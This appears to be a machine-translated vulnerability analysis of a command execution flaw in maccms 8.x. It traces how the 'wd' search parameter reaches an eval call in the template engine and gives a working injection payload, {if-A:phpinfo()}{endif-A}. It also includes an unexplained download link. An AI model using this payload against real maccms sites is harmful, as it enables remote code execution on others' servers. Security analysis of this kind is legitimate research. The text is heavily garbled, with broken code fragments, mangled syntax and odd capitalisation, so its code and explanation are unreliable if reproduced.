Download link https://share.weiyun.com/23802397ed25681ad45c112bf34cc6db
First Open the index.php
$m = Be (' Get ', ' m ');
The M parameter gets after the 17th row is split
$par Explode ('-',$m);
Fill in here? m=vod-search
After 34-39 lines of processing
$acs Array (' VOD ', ' art ', ' map ', ' user ', ' gbook ', ' comment ', ' label '); if (in_array($ac,$acs)) { $tpl$ac; include Mac_root. ' /inc/module/'. $ac. " php '; }
This will include the/inc/module/vod.php
ElseIf ($method= = ' Search ') {$tpl->p["siteaid"] =; $wd = is ("All", "WD"); if (! Empty ($wd$tpl$wd;}
Then get WD parameters
And then entered the area near line 45th index.php.
$tpl->ifex ();
Trace function
Just got up.
function Ifex () { if (! Strpos(",". $thisreturn;} $labelRule = buildregx (' {if-([\s\s]*?):( [\s\s]+?]} ([\s\s]*?) {endif-\1} ', ' is ');
Define regular rules and $this-h in the VOD file,/inc/module/vod.php 189 near the line
$tpl->h = LoadFile (mac_root_template. ") /vod_search.html ");
Back to/inc/common/template.php 866 lines
Preg_match_all ($labelRule,$this->h,$iar);
is actually matching the extracted WD parameters.
And then into the loop.
for ($m= 0; $m<$arlen; $m+ +) {$strn$iar[1][$m] ; $strif $iar [2] [$m]) ;
Then go down and find that you want eval.
The 916 to 921 line limit is the least
Else{//Die ("if ($strif) {\ $ifFlag =true;} Else{\ $ifFlag =false;} ");@Eval("if ($strif) {\ $ifFlag =true;} Else{\ $ifFlag =false;} "); if($ifFlag){$this->h=Str_replace($iar[0] [$m],$strThen,$this->H);}Else{$this->h=Str_replace($iar[0] [$m],"",$this-i); }}
Summarize the $this-h must have {if-We enter the WD parameter with {if-can be bypassed
And then meet
{If-([\s\s]*?):( [\s\s]+?]} ([\s\s]*?) {endif-\1}
This commits
{If-A:phpinfo()} {endif-A}
Into the Preg_match_all, the above content is thrown into a two-dimensional array.
The function of line No. 874 is
for ($m= 0; $m<$arlen; $m+ +) {$strn$iar[1][$m] ; $strif $iar [2] [$m]) ; --874
Phpinfo ()
Then the IF condition of 881 rows is not satisfied
if (strpos(",". ) $strThen,$labelRule 2) >0) {
Enter 906 rows without satisfying the if of 908 rows
if (strpos(",". ) $strThen,$labelRule 3) >0) {
Entered the most unrestricted line of 916.
Cause the command to execute
maccms8.x Command Execution Vulnerability analysis